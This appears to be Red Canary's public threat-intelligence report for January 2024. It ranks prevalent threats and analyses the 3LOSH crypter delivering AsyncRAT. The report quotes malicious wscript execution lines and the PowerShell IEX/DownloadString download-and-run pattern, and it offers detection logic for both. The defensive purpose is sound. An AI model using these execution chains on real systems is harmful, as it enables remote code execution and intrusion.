Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.
Highlights
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for January 2024:
| Last month's rank | Threat name | Threat description |
|---|---|---|
| Last month's rank: ➡ 1 | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Last month's rank: ⬆ 2* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Last month's rank: ⬆ 2* | Threat name: | Threat description : Dropper/Downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Last month's rank: ⬇ 4 | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
| Last month's rank: ⬆ 5* | Threat name: | Threat description : JScript dropper/downloader that typically poses as a document containing an "agreement”, often distributed through search engine redirects |
| Last month's rank: ⬇ 5* | Threat name: | Threat description : Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects |
| Last month's rank: ⬆ 7* | Threat name: 3LOSH | Threat description : Crypter, typically used to package and deliver a remote access tool like AsyncRAT |
| Last month's rank: ⬆ 7* | Threat name: AsyncRAT | Threat description : Open source remote access tool with multiple functions including keylogging and remote desktop control |
| Last month's rank: ⬇ 7* | Threat name: Charcoal Stork | Threat description : Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| Last month's rank: ⬇ 7* | Threat name: Denim Drongo | Threat description : Group that leverages installers masquerading as QuickBooks in a scam that attempts to defraud users via fake technical support |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
We kicked off the new year with many threats that are no strangers to our top 10 list. Impacket remained at number 1 for the third month in a row, thanks to a combination of malicious use and testing. We remove confirmed testing from our top 10, but if activity isn’t confirmed as testing we leave it in our metrics.
Gootloader saw a significant increase in activity, jumping from 22nd last month to tie for 5th with Yellow Cockatoo this month. We dug deeper to gain insight into such a dramatic change; our current assessment is that there doesn’t seem to be a wave of increased Gootloader activity in general across the community, but rather a chance increase of Gootloader in our customers’ environments.
3LOSH and AsyncRAT spotted getting cozy
We saw 3LOSH and AsyncRAT in a four-way tie for 7th this January. The last time they made an appearance in the top 10 was also together, back in July 2023, and the pairing is no coincidence.
3LOSH is a crypter frequently used to package and deliver remote access tools (RAT). It’s been in use since at least August 2021. At Red Canary we’ve most frequently seen AsyncRAT delivered by 3LOSH, a pattern noted outside our environments as well. Other researchers have also reported seeing 3LOSH deliver njRAT and LimeRAT.
Since 3LOSH is used by a variety of adversaries, the initial access vector also varies. One method observed in the wild is phishing campaigns leveraging HTML smuggling to download an ISO containing the 3LOSH script. Separately, we at Red Canary have seen ZIP files containing the 3LOSH script and also uncompressed downloads of 3LOSH as a JavaScript attachment. Next, 3LOSH relies on user execution of the malicious .wsf or .js script, typically executed via wscript.exe.
For example:
"WScript.exe" "C:\Users\username\AppData\Local\Temp\Temp1_invoice-000000.zip\invoice-000000.wsf"
or
"C:\Windows\System32\WScript.exe" "C:\Users\username\Downloads\ Your_Social_Security_Statement_is_streamlined_Service_ID_XXXXo1xq5sa8S.JS"
In some cases, 3LOSH leverages bitsadmin.exe to download an intermediary VisualBasic script, and may also execute PowerShell to download remote resources. 3LOSH sometimes obfuscates this command line by splitting the IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING command into substrings assigned to randomly named variables. The execution chain of wscript spawning PowerShell, plus the use of Invoke-Expression or one of its aliases, gives us a detection opportunity:
Detection opportunity: Instances of PowerShell being spawned by wscript, using Invoke-Expression or one of its aliases
The following pseudo-detection analytic identifies instances of wscript spawning PowerShell, specifically using Invoke-Expression or one of its aliases. A variety of threats, including 3LOSH, use this behavior to execute malicious scripts on victim systems.
process == (powershell)
&&
parent_process == (wscript)
&&
command_line_includes == (iex, .invoke, invoke-expression)
As mentioned, AsyncRAT is often the RAT-du-jour delivered by 3LOSH. AsyncRAT is an open source RAT that can be configured to perform a number of functions, including keylogging and remote desktop control, making it a popular choice used by multiple adversaries.
AsyncRAT is also delivered using methods besides 3LOSH. Since at least January 2024, Red Canary and other researchers have observed the delivery of AsyncRAT via SocGholish malicious JavaScript files.
AsyncRAT is sometimes injected into the process regsvcs.exe, which gives us a detection opportunity.
Detection opportunity: regsvcs.exe executing without any command-line parameters
This pseudo-detection analytic identifies regsvcs.exe executing without any command-line parameters. Normally regsvcs.exe executes with a CLI argument. Threats like AsyncRAT will be injected into regsvcs.exe in an attempt to evade detection while continuing malicious activity, like reaching out to remote resources or executing additional processes.
process == (regsvcs)
&&
command_line_includes == (null)